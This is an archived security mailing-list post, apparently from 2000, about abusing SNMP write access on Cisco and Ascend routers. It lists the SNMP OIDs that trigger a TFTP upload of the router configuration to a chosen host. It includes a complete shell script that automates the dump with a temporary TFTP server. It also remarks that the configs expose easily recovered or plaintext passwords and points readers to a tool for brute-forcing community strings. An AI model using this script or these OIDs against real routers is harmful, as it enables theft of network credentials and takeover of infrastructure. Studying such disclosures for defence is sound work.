cisco/ascend snmp config tool or exploit? -- Re: snmp problems still alive

[monti () USHOST COM (monti)]

Disclaimer: The attached utility is based on widely known public
information and it's functionality is replicated in many very expensive
commercial products. This information is provided for educational purposes
only. I am not responsible for misuse of this tool or information.

May this script help make SNMP die the sad lonely death it deserves once
and for all!

On that note... I originally cobbled this together to keep the network
admins I worked with from doing annoying things like keeping tftp daemons
running on my Unix hosts for weeks on end. Its pretty handy for that too.

It's just a lame little script to automate snmp/tftp config dumps from
ciscos and ascends using snmp/tftp with a temporary tftp server. I
thought it might be of interest (to some) while we're on the subject
(again) of snmp router config downloads. I've seen several home-grown
versions of this for ciscos out there, a handful for ascends, but have not
run across any that do both, so...

The OID's to acomplish this on ciscos and ascends are below. Basically in
both cases doing an SNMP set on certain variables will trigger the tftp
config upload from the target router.

'XXX' denotes IP address octets for where you want the config to go.

Cisco:
SNMP set .1.3.6.1.4.1.9.2.1.55.XXX.XXX.XXX.XXX type=s(string) "tftp-filename"

Ascend:
SNMP set .1.3.6.1.4.1.529.9.5.3.0 type=a(addr) XXX.XXX.XXX.XXX
SNMP set .1.3.6.1.4.1.529.9.5.4.0 type=s(string) "tftp-filename"

As everybody knows, Cisco type 7 hashes are trivial, and ascends keep
passwords unencrypted, so this tool or one of the zillion others like it
(HP Openview anybody?) could be used by crazed frothy-mouthed sociopaths
to dish out truckloads of evil upon meek internet-shoppers!!!@!@#$!!!

As others already have mentioned, it's worse too since you could just
replace a config if you're in the mood. The OID's to accomplish that can
be found in the respective cisco and ascend MIBs nearby the ones outlined
above. I didnt put these in my script for fairly obvious reasons given
it's original intended users ;)

-Eric Monti

--BTW. 9 out of 10 'forgetful admins' recommend the use of ADMsnmp for
brute-forcing communities!

On Tue, 15 Feb 2000, Gus Huber wrote:

> It should be noted in this discussion that MANY of these devices also
> through SNMP querys can be completely compromised by either sending or
> recieving configuration files from arbritrary locations.  Both cisco and
> ascend products support downloading and uploading of configuration files
> via tftp from an SNMP query.  From that point it is trivial to sniff
> network trafic.  AFAIK, ascend still ships with the SNMP communitys set as
> public for read-only, and write for RW.  Also many hardware devices do not
> log querys sent to invalid SNMP communitys in SNMPv1, so it is a simple
> game of brute force to get those communitys.


#!/bin/sh
#  grabrtrconf:
#  Pull router configs via tftp for cisco's and ascends. obviously trivial to
#  modify this for other network hardware that supports this type of thing.
#
#  - [type] can be one of cisco | ascend currently
#  - defaults to cisco
#  - requires cmu snmp utilities (snmpset specifically)
#  - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to
#    launch a 'temporary' in.tftpd just to grab the file.
#  - 'pidof' only exists on linux that I know of which kindof makes this a 
#    linux-only tool, unless/until I decide to stop relying on it.
#  - Set 'INT' to whatever your routable IP is.
#  - run as root (if you want to launch the tftp server)
#
#  - I know this is lame... but it works (most of the time).
#
#  by: Eric Monti 11/1997
# 

TFTPLISTEN="true"

DIR=/tftpboot #might want to use something else
WAIT=6
INT=ppp0
 
test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1

TYPE=$5
test "$5" = "" && TYPE="cisco"

IPADDR=$3
test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'`

echo $3

if [ -n $TFTPLISTEN ];then
        echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf
        /usr/sbin/inetd -d /tmp/ind.conf &
        rm /tmp/ind.conf
        rm -f $DIR/$4
        touch $DIR/$4
        chmod 666 $DIR/$4
fi

#CISCO get config
test "$TYPE" = "cisco" && \
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4

#ASCEND get config
if [ "$TYPE" = "ascend" ];then
  snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR 
  snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4
  snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3
  snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0"
  snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s ""
fi

sleep $WAIT

# i got lazy and used pidof... so what. 
# I made pretty dots appear to make up for it!
if (test `pidof in.tftpd`);then


 echo Receiving file: 
 while (test "`pidof in.tftpd`");do
        echo -n .
        sleep 1
 done
 echo
 echo Transfer Complete

fi

if [ -n $TFTPLISTEN ];then
        kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1
fi